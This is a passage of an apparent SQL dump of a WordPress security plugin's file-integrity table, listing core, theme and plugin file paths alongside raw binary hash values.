���TJmc��K˱\\��4','',0,'?'),('��������/�@�~�','wp-content/themes/Yegor/searchform.php',0,'9fj�Ȇ�8����F�','9fj�Ȇ�8����F�','�FE��㮍�ȉ[\'����p�� nQ&_�&','',0,'?'),('�&� A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nt�|�\'3�� 0���','\rL�G��6���q ��\\�-���P�I���','',0,'?'),('�RCm>[\\\'��0H�','wp-content/themes/showcase-lite/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e���*��t�?q���','�̵$�p�#��m?�i�4UC���\\�b�','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<�� Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W�� �v_�#�� f��~��R�>','',0,'?'),('rii픥r{��(qq','wp-content/themes/hueman/assets/front/img/demo/2-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*��D5���x�,','{�)h�\r��-����cJ�cY$�U��','',0,'?'),('#�/����v���L','wp-content/themes/hueman/sidebar-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y���W\r��=dr�a','� �B��`�j�R�\"|��M 1C��) �s_�\n6','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3ܧ_����Z�#�t','�V5�Rj:Z��.���\n5� ��_�3�O�','',0,'?'),('$CJr>�d��,���e','wp-content/themes/showcase-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s�4{��.�x�Ӡ�','�wZ�D(=aJug�&�%��O�^�+`��\n�a� �','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���{�����&ij��','ڙ��ڢ��D��W����\rэ��3�U��','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�P��y�BB&F4','�k������i�]J�� ��ƙ۰Tl��x�','',0,'?'),('.�G�d��E�D@���','wp-content/themes/pine/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�c�W�1�JH`�ko','ʱ55�]���8�4H�F��H�_�.�ypR�Yjn�','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�12�;�j�4�F|','ȾLg7���ԠB�$Ru�H�������io��','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('<��te���گ','wp-content/themes/Endolf/js/vticker.js',0,'��.JJ\'1\Z3rq�A�','��.JJ\'1\Z3rq�A�',' �_���\\UJ�f�J��xq_��>ɳ-W@Q��','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�: ��\r�j','����Z5L�ѾR��9��� `C���)�M','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��9�j�����\Z','��D���8>�̓��hv�!�5�y�1��','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��|�bA~tb`*','�����}͒l>��-A�����T�$��]n','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('w��bn��\'�k���i5','wp-content/themes/hueman/assets/front/css/main.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�O<a-�c�k�?','7���Q#_�0�F�D��ʁI��\"j�c|K','',0,'?'),('ye&ߔO)x��p�','wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php',0,')6��):�������',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('yהZ�\Z��& ��','wp-content/themes/advance/inc/kirki/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&ɔV(�t��1�','���\0��+Ǫ����\'!���p²D�\n�re�','',0,'?'),('�\r]$����1qVe','wp-content/themes/spidermag/assets/images/left-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�F�3�<l4��!�J','^2;�o\0�v�s���r��v*pE:��j�u�a','',0,'?'),('�}��g�@��.��','wp-content/themes/storeone/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Psh�J�\"`U?','����W�U���!��cD�m}��/���8�','',0,'?'),('�j����&(�,}u','wp-includes/wp-includes/js/dist/blob.js',0,'$ج�o8)�c����','$ج�o8)�c����','��\Z\Z���#9�#�H�;yό�:˙���#e','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��@�Q�zGz�H','\"e�5�����-��fh�b?#r��=�a�v͠�','',0,'?'),('���,\"�����j��','wp-content/themes/Yegor/header.php',0,'����N�@N\"kj���','����N�@N\"kj���','0).�7ҀN&���x���ؾ�^X��ӭ±�','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�@~vȃ���A','JvQܢZ�f��ґ3���(8tЇa�KC�@�e�','',0,'?'),('�?S\\�����C��5�','wp-content/themes/storeone/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�PS�\'��Z5�Z}��','���qa#T0��T�n=���8X\n�Bg%L�','',0,'?'),('�/�V� X�[�\n�','wp-content/plugins/wp-cerber/assets/flags/cv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#!�C�@���','�#���wQ�u����g���u��w[��ȥ~','',0,'?'),('�P7��|�R�_\n{�','wp-content/themes/spidermag/spidermag/customizer/custome-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�Is���\0�\Z�܆��','bmP�M��^��u8�?P�fb���yw��','',0,'?'),('�-F�0|��5k���^','wp-includes/wp-includes/block-supports/custom-classname.php',0,'�ؚ�WiY�C��v�G','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('̾���?؏��D��','wp-content/themes/event/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����lw\"�1���Co�','���ġ���~�gJ���͠,��@��d','',0,'?'),('�C��qE(��QWV�','wp-content/themes/gambit/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��N�I�Qu��W���','���5\\A����W]�a��r�:�#�+K>�G5�','',0,'?'),('���a�6��2(���','wp-content/themes/newsmag/assets/sass/modules/_related-posts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4jpM�&�H�eℱ��','���ѩ�ߨ��a&79�R�e��4���f��b���','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),(' QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_͂�t��WQ1�aL�','@FY�v�G^\n����}/$O���~;a\0M','',0,'?'),(' ?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),(' ȸ��o��ȷ\'�','wp-content/themes/newsmag/inc/widgets/homepage_slider/layouts/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hM/&�Ηi}�T\'','W�D㴰(�\0����\ZO��A�m��mȑ��+�','',0,'?'),(' ,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),(' -���H�:]\\D\n���','wp-content/themes/Kent/404.php',0,'Y̬!��d֍�@��L','Y̬!��d֍�@��L','�}��k�̐,��(r�g_��Rv{�~d�f�C','',0,'?'),(' 7�������f `','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m �8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),(' 7�V3��u�����7','wp-content/themes/hueman/option-tree/includes/ot-functions-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`U_K._`V+?,��','��EN\'I.T2qT\\\0Z\n�q�t��alm�u(i','',0,'?'),(' J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),(' P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),(' X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]t\r;��B�� ��]�','����\r �?���\"��hz�3��L�W�q�5�\"','',0,'?'),(' mfT�Hp��B4�t�','wp-content/themes/newsmag/assets/sass/navigation/_navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��\"�Gg?�,0k�','�n�v��-yoq�-YV�<��������','',0,'?'),(' �W9R?;�[о��','wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���tf�e�9� F�','t��a±�\0ӫ�I�D�v2u��\0���+�T�','',0,'?'),(' �h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_����&��x��','�G�X<����$��~\0��g>�\0W ���\"!','',0,'?'),(' ��w���\r�5]�O','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�_���wW�?O','�*b]E�&�JαŠ�\\��4\0b1�>.w!�','',0,'?'),(' ��8�a�^�N�a�!','wp-includes/wp-includes/js/codemirror/htmlhint-kses.js',0,'��[��k[�#cLf{','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),(' �.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),(' ��H��J%]�:�%?�','wp-content/themes/spidermag/spidermag/customizer/header-section/header-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�<��E�C�3�J','Q�c����xl#*��E�b�����%,m','',0,'?'),(' �l�q�1T��i��','wp-content/themes/twentynineteen/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�@*�D/�\\�I�','��X�m�W����M����K�t�V8Ɗ�','',0,'?'),(' �|9㚉0�`sV+F>�','wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߩ�\n�����\"�','t����]? }�\r�e�tդ�S͎�CT)� �','',0,'?'),(' ɑ#Xlb���f����','wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php',0,'��T�Ԧʙ`�P��L','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),(' Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\n>LZ�߇�&���','?��7�p\Z�r�rw��ns\nq���l�+}��#�','',0,'?'),(' �9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk� �6|��{�*\Z��{�H����iܝk^','',0,'?'),(' �n��!���0r�ē\n','wp-content/themes/storeone/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӌ���y!���&','0��xR����>��ȳb��{�Q���e�a.���','',0,'?'),(' �)a��x��u���','wp-content/plugins/wp-cerber/assets/flags/sm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4��f�����u�n','���v-��d1�Y2�0�-�����*�����','',0,'?'),(' �t��>���m��','wp-content/themes/showcase-lite/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?֏k�YW!dt���','Ϸ�m0h�K_#-8P5������,','',0,'?'),(' ��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J��+��4G��Ѹ','+\\�X��IJ��J����\'�|��KiV��TD����u','',0,'?'),(' ����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��p ���TcP\"','4����Z�@�\'x�ȬV��gR��l�\r�%','',0,'?'),(' �/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),(' ��i�AT�Hd��*��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��1z؛d��L','�8�x��\Z݁�[D����A��W/O�wĪ�','',0,'?'),(' �by\'���w��X��','wp-content/themes/sg-window/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rUJj��ߔ�m���*��','.agO=�E�#�) 0�y�y��\r��F��ԑ�','',0,'?'),('\n����uU��','wp-content/themes/auberge/template-parts/menu-primary-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�5�\0��C���','�MLq\"���Ew�g��ejf�\"�R(�h','',0,'?'),('\n%2F�0��h\"�Ha��','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('\nB��&�4u���B?�','wp-includes/wp-includes/sodium_compat/lib/php72compat.php',0,'AG�\Zˢ;�������l','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f o��I1Z�N}v�-','̈́q}�0N�PvQ�&k����T�@/`v�','',0,'?'),('\n{X%N8w�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n��=,C��$��Wn','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:��\0�:C�uxc�','��c�&8�rwϜޮ�?�[6\\�� �����','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n�EѴO�W�aQ����','wp-content/themes/pine/admin/js/pine-customize-control-layout.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]�\0_��ɬ�2�p','$\0�#��̐Q6�.�ʪ(\0�)��Ѣ0��M}�','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Zeq�i�[��\rv','[��ϣb]�9�\\�|��ֲ*V\r�~��z�^','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n�u����<�:>`<>P','wp-content/themes/hueman/assets/front/img/thumb-medium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9= �켄��Keer','��w7��1�\rGF��VM�|�<=LJ|ؤƧ�','',0,'?'),('\n�:]J�w����E�','wp-content/themes/hueman/option-tree/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�e�W|�9���+u','-Qp����F�j�p�.x���2�s�ì�\Z�','',0,'?'),('\nʘ�����f�W \nE','wp-content/themes/travel-stories/js/jssor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��s)�C l+�\\렊','���}�yP��\Z�d�B��E��XHߤ��``','',0,'?'),('\n�>�?3�rј�Y','wp-content/themes/anima/cryout/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D��w���\0 ���','M��,g �[��B�1���w�)�N����Zy^','',0,'?'),('\n�Oe�lg�n�3\"��6�','wp-content/themes/twentynineteen/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~*2W�p �d�','v\\$�YTp�>*�V�&Q���=��^ÍC{ExX','',0,'?'),('\n�!^�划����T\n�','wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5vElT��ͤ���Q5','W�F����:ڮU��3���dm�0�� ���','',0,'?'),('\n�\r��:�n#�pJ�yX','wp-includes/wp-includes/css/dist/format-library/style.css',0,'�\Z۹��Pf!�\'D��','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!��','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&�0G�����Q��ʚ','�gJRb��\0tf�2Å�&��0u�jYH�i��','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ϳ�FY�� p*','~!Z���7��/���<��3�Y�,�=Zk(','',0,'?'),('���юGMm�d�','wp-includes/wp-includes/blocks/tag-cloud/block.json',0,'��M0����*��','��M0����*��','���-ZE�\n�*��6�]\\� ]m�{N��','',0,'?'),('5fa\"w�m��P\0�?','wp-content/themes/newsmag/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$����|J�Ш}��2� ','��6}_DgĘp8J�ٯ���7�� ����','',0,'?'),('�c{���� �C��[','wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js',0,'����3|G^�cKT\"�','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('Y��ߺnjO��$��','wp-content/themes/capacious/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��J�3+�\"]�n�','�\"A��ƚ�b�^T��kLCS��r�K�����','',0,'?'),('Y]�<N�m��%�','wp-includes/wp-includes/js/dist/viewport.min.js',0,'����>��`،�@�8�','����>��`،�@�8�','p�J^_��Wm�kN_���b�vc\n�����!cU�','',0,'?'),('}spK�� ��:�','wp-content/plugins/akismet/views/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY�]�Z�.^<��&Un','�G�,|�8������i1��<2�,�8��+w','',0,'?'),('~�Fӡ�q���TMB�','wp-content/plugins/wp-cerber/assets/flags/ls.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�?\0��rɝ��E?�','�t?B��\0��{��!����e��Wh�ٲv��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('� �>�=\nO�\nO&��','wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/bܪ`�rik�k�B|','T):��bM�|�����Z���ZM�Q�~���','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy� m�v�1R�2\ng�\\�','',0,'?'),('�2���M-q ,\"�\'@','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+ �','',0,'?'),('�}��$�s_p!\'��','wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',0,'�K�.�Aj_�m�r#i�','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('��!���\\Qq��|~�','wp-content/themes/sg-window/inc/js/image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�~&�V�\Z[0�','$�8�Iv��Q�L��N�H\nL@:?kL�7�Y�_','',0,'?'),('˾`�BM�`�~!�ǰ�','wp-includes/wp-includes/ID3/module.audio.dts.php',0,'�llA�2���̋�','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('��K�\r!t{ף0{�','wp-content/themes/anima/resources/images/slider/static.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)|��V*�\'U8','و��4 N��}��}�.R���\"�8��M�','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�{`+�������\0|','wp-includes/wp-includes/js/jquery/jquery.query.js',0,';�Xz�ǰ��wC',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('��\'��k��[��u','wp-content/themes/wp-barrister/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VY���E��}��,qY�','����� O�aS�C\0�_Df��r�Į\"<3�','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('�RMV��JR��a+�M','wp-content/themes/auberge/includes/tgmpa/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�N�1��s��� \r','�s}�%&�&�s��~�|�2,��\n����L)�m','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�a2��%x�h�YB','p�����~���&�������W�OX(Û ','',0,'?'),('%��aqm��Z��T4','wp-content/themes/kidzoo-lite/css/kidzoo.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�Y��x���l�','`vy�n�����l�R�A�3�\ZͤЏ�Biz�C�','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�lh�¸�j�68��','V]�l��1W�+ {6v��ޣ��C���=��','',0,'?'),('+���W�ͽ^L�H�l','wp-content/themes/promote/inc/kirki/assets/js/controls/radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4��ȦAGȲ�n��\"','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('-�x�~/o����{','wp-content/themes/advance/css/unminified/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g7q��709\r�3','�;B�h(oaї��4��if�c����b�;�2','',0,'?'),('=�NgÈ�����W;','wp-content/plugins/wp-cerber/assets/flags/ci.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�yd���2¹��','���.�=D ��dԢ���)�*k���,8Dˬ','',0,'?'),('@������4����','wp-content/themes/auberge/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�I�J>$V��WW�','���s\\�k�O/;_t3(���E�f��4��','',0,'?'),('CX��2��k��Cҳ�','wp-includes/wp-includes/js/wp-ajax-response.min.js',0,'/pM]�{\"@���s�:l�','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g^�C>��uJ�>�\Z','�V.��/�SV��9:_I:aldt�p���aue','',0,'?'),('Gyv^/d�����Y�','wp-content/themes/capacious/section-parts/section-testimonials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B~�o�NE��#oU ','�\'�4M�@��g!��b$�Wk���Ot�cd3�\\','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} 